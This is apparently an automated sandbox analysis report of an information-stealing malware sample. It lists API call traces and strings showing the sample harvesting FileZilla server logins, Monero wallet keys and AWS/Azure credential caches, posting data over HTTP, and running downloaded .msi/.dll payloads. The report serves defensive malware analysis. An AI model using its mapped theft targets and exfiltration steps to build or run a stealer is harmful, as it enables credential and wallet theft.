                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00529BA3
                                      • LocalFree.KERNEL32(?), ref: 00529BD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 445025cdba1d0051fb404746735fdc197c3392f185646acb958253fca125b71c
                                      • Instruction ID: 46e9bf5d76fa93b7f22fb4caaed577dd439d5cd7e7fbaea0e929ff11d60d58f8
                                      • Opcode Fuzzy Hash: 445025cdba1d0051fb404746735fdc197c3392f185646acb958253fca125b71c
                                      • Instruction Fuzzy Hash: E9315CF3F045104BE3545D2AEC95767B6C6EBC4320F2B823DDA89DB780D8795C0682D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65774c3c86601e7192355e9f2a3eada0acbbde60d24109ba058990b11909ee97
                                      • Instruction ID: b9a0afeef0ab087d64b4cec06bbd786b0aa0e263ffdc293536494053bf4c97b0
                                      • Opcode Fuzzy Hash: 65774c3c86601e7192355e9f2a3eada0acbbde60d24109ba058990b11909ee97
                                      • Instruction Fuzzy Hash: 0331ABB360C704AFE701AE5ADC817BAB7DAEFC4661F16892DD6C0C3B14D67198418693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00540DBA,00540DB7,00540DB6,00540DB3), ref: 00530362
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00530369
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00530385
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530393
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 005303CF
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 005303DD
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00530419
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530427
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00530463
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530475
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530502
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053051A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 00530532
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053054A
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00530562
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00530571
                                      • lstrcat.KERNEL32(?,url: ), ref: 00530580
                                      • lstrcat.KERNEL32(?,00000000), ref: 00530593
                                      • lstrcat.KERNEL32(?,00541678), ref: 005305A2
                                      • lstrcat.KERNEL32(?,00000000), ref: 005305B5
                                      • lstrcat.KERNEL32(?,0054167C), ref: 005305C4
                                      • lstrcat.KERNEL32(?,login: ), ref: 005305D3
                                      • lstrcat.KERNEL32(?,00000000), ref: 005305E6
                                      • lstrcat.KERNEL32(?,00541688), ref: 005305F5
                                      • lstrcat.KERNEL32(?,password: ), ref: 00530604
                                      • lstrcat.KERNEL32(?,00000000), ref: 00530617
                                      • lstrcat.KERNEL32(?,00541698), ref: 00530626
                                      • lstrcat.KERNEL32(?,0054169C), ref: 00530635
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00540DB2), ref: 0053068E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 1e89ccb4e4ae98ddf07c873500403c9e35c06443a07a8142be7ae1aa880a227e
                                      • Instruction ID: 7e7b60919719e0cb728100c62e0f5e529da0825b3c3de287f295630377906c21
                                      • Opcode Fuzzy Hash: 1e89ccb4e4ae98ddf07c873500403c9e35c06443a07a8142be7ae1aa880a227e
                                      • Instruction Fuzzy Hash: 88D11F72900209ABCB04EBF4DD9AEEEBB38BF94300F548418F142B7195DF74AA45DB65
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005259F8
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00525A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00525B93
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F1E778,00000000,?,00F0FA88,00000000,?,00541A1C), ref: 00525E71
                                      • lstrlen.KERNEL32(00000000), ref: 00525E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00525E93
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00525E9A
                                      • lstrlen.KERNEL32(00000000), ref: 00525EAF
                                      • lstrlen.KERNEL32(00000000), ref: 00525ED8
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00525EF1
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00525F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00525F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00525F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FBD
                                      • HttpOpenRequestA.WININET(00000000,00F1E808,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00525BF8
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00525FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 05423f7edd73ebbbb2dd92fa418bc9f8de13dec81c61079ae067135c5be6defd
                                      • Instruction ID: 6deedd670b95ad533e933340c152e64cb9f2e0687e1561172d24ca2e481cbebe
                                      • Opcode Fuzzy Hash: 05423f7edd73ebbbb2dd92fa418bc9f8de13dec81c61079ae067135c5be6defd
                                      • Instruction Fuzzy Hash: BB120E72820119ABDB15EBA0DC99FEEBB78BF94700F504199F14772091EF702A49CF65
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0052D0C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0052D0CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D208
                                      • lstrcat.KERNEL32(?,00541478), ref: 0052D217
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D22A
                                      • lstrcat.KERNEL32(?,0054147C), ref: 0052D239
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D24C
                                      • lstrcat.KERNEL32(?,00541480), ref: 0052D25B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D26E
                                      • lstrcat.KERNEL32(?,00541484), ref: 0052D27D
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D290
                                      • lstrcat.KERNEL32(?,00541488), ref: 0052D29F
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D2B2
                                      • lstrcat.KERNEL32(?,0054148C), ref: 0052D2C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052D2D4
                                      • lstrcat.KERNEL32(?,00541490), ref: 0052D2E3
                                        • Part of subcall function 0053A820: lstrlen.KERNEL32(00524F05,?,?,00524F05,00540DDE), ref: 0053A82B
                                        • Part of subcall function 0053A820: lstrcpy.KERNEL32(00540DDE,00000000), ref: 0053A885
                                      • lstrlen.KERNEL32(?), ref: 0052D32A
                                      • lstrlen.KERNEL32(?), ref: 0052D339
                                        • Part of subcall function 0053AA70: StrCmpCA.SHLWAPI(00F197A0,0052A7A7,?,0052A7A7,00F197A0), ref: 0053AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 3792ad7c753a2e868f6ddc64582a1e1b920280f5bfcaaa2b32b80d16c190e012
                                      • Instruction ID: 6eb110d2ca0670eb9689b181b113010355766c4ce93d567362a3276ddb089de5
                                      • Opcode Fuzzy Hash: 3792ad7c753a2e868f6ddc64582a1e1b920280f5bfcaaa2b32b80d16c190e012
                                      • Instruction Fuzzy Hash: 9DE1227291020AABCB04EBA0DD9AEEEBB78BF54301F104158F147B7091DE75AE45CF66
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F1D4B8,00000000,?,0054144C,00000000,?,?), ref: 0052CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0052CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0052CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0052CAA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0052CAD9
                                      • StrStrA.SHLWAPI(?,00F1D470,00540B52), ref: 0052CAF7
                                      • StrStrA.SHLWAPI(00000000,00F1D5A8), ref: 0052CB1E
                                      • StrStrA.SHLWAPI(?,00F1DC40,00000000,?,00541458,00000000,?,00000000,00000000,?,00F198B0,00000000,?,00541454,00000000,?), ref: 0052CCA2
                                      • StrStrA.SHLWAPI(00000000,00F1DA80), ref: 0052CCB9
                                        • Part of subcall function 0052C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0052C871
                                        • Part of subcall function 0052C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0052C87C
                                      • StrStrA.SHLWAPI(?,00F1DA80,00000000,?,0054145C,00000000,?,00000000,00F198F0), ref: 0052CD5A
                                      • StrStrA.SHLWAPI(00000000,00F199B0), ref: 0052CD71
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B46), ref: 0052C943
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B47), ref: 0052C957
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B4E), ref: 0052C978
                                      • lstrlen.KERNEL32(00000000), ref: 0052CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0052CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 6679010666b1f445f61fa35f5ba82b30f4574e4d1271a7cc36611eac160173b8
                                      • Instruction ID: 16152153b1a04ed4fc5b59d5ff93100734fa677289a33c1f1f963c7c245597cd
                                      • Opcode Fuzzy Hash: 6679010666b1f445f61fa35f5ba82b30f4574e4d1271a7cc36611eac160173b8
                                      • Instruction Fuzzy Hash: 23E10A72900109ABDB15EBA0DC9AFEEBB78BF94300F004159F14677191EF746A4ACF66
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,00F1B0C8,00000000,00020019,00000000,005405B6), ref: 005383A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00538426
                                      • wsprintfA.USER32 ref: 00538459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0053847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538499
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      Strings
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 18f332cdf1c112b14c6630e6197a9f6781d533606cfa31189422c6f22c1234c9
                                      • Instruction ID: bc30d0f89d0d9d99abf317a596355f90192c2a17e66682c17d3e0031ada20ddc
                                      • Opcode Fuzzy Hash: 18f332cdf1c112b14c6630e6197a9f6781d533606cfa31189422c6f22c1234c9
                                      • Instruction Fuzzy Hash: FC811E71910219ABDB28DB50CC95FEABBB8FF48700F008699F14AA6180DF756B85CF95
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534DB0
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00534DCD
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 0053492C
                                        • Part of subcall function 00534910: FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534E3C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00534E59
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                        • Part of subcall function 00534910: FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                        • Part of subcall function 00534910: FindClose.KERNEL32(000000FF), ref: 00534B92
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534EC8
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00534EE5
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 005349B0
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,005408D2), ref: 005349C5
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 005349E2
                                        • Part of subcall function 00534910: PathMatchSpecA.SHLWAPI(?,?), ref: 00534A1E
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00F1E938), ref: 00534A4A
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00540FF8), ref: 00534A5C
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,?), ref: 00534A70
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00540FFC), ref: 00534A82
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,?), ref: 00534A96
                                        • Part of subcall function 00534910: CopyFileA.KERNEL32(?,?,00000001), ref: 00534AAC
                                        • Part of subcall function 00534910: DeleteFileA.KERNEL32(?), ref: 00534B31
                                      Strings
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: df36f711d821cbe9cc88f22b8bb33d641757d7a1fd85cb8301b580cd8700eb9d
                                      • Instruction ID: aa90f98be3981957e8cf0431b1b18d16e22a1bd38feac45c5cd7839fd9f256b6
                                      • Opcode Fuzzy Hash: df36f711d821cbe9cc88f22b8bb33d641757d7a1fd85cb8301b580cd8700eb9d
                                      • Instruction Fuzzy Hash: CB41867A94031967D714F760EC5BFED7B38BB64704F004494B28A660C1EEB5ABC88F96
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0053906C
                                      Strings
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 5d150a3cc00f75c8e6bdd78abc6c26aec47421425e5afed4e48ca074f9fa21da
                                      • Instruction ID: e52f7f13cdf3891c2552905f2eb40a64e4922d814677acf2fc39980f2c53f3cf
                                      • Opcode Fuzzy Hash: 5d150a3cc00f75c8e6bdd78abc6c26aec47421425e5afed4e48ca074f9fa21da
                                      • Instruction Fuzzy Hash: DB71C0B5910209BBDB04DBE4DC89FDEBBB9BF88700F148508F516A7290DB78A905CF65
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 005331C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0053335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 005334EA
                                      Strings
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 00f09f62d0a83d9dcd63bd57daa9fb609b8620dac542f412ebf827f84aed0593
                                      • Instruction ID: 8d616abbcfb516af8d79177a6c90e695315b8df650f1e76d37dc20120e09d47d
                                      • Opcode Fuzzy Hash: 00f09f62d0a83d9dcd63bd57daa9fb609b8620dac542f412ebf827f84aed0593
                                      • Instruction Fuzzy Hash: D2121172810109AADB09FBA0DC9AFEDBB38BF94300F504159F54676195EF742B4ACF92
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 00526280: InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                        • Part of subcall function 00526280: StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                        • Part of subcall function 00526280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                        • Part of subcall function 00526280: HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                        • Part of subcall function 00526280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                        • Part of subcall function 00526280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535318
                                      • lstrlen.KERNEL32(00000000), ref: 0053532F
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00535364
                                      • lstrlen.KERNEL32(00000000), ref: 00535383
                                      • lstrlen.KERNEL32(00000000), ref: 005353AE
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 4f53338f689fe2d108466b78a3ebc77cf186dfc2b76195abdc03fe6a6c5351ac
                                      • Instruction ID: 7d0991ef6c1cac6bb66c00094d0c923c1840564bf2053e19476d42c6be2e88a3
                                      • Opcode Fuzzy Hash: 4f53338f689fe2d108466b78a3ebc77cf186dfc2b76195abdc03fe6a6c5351ac
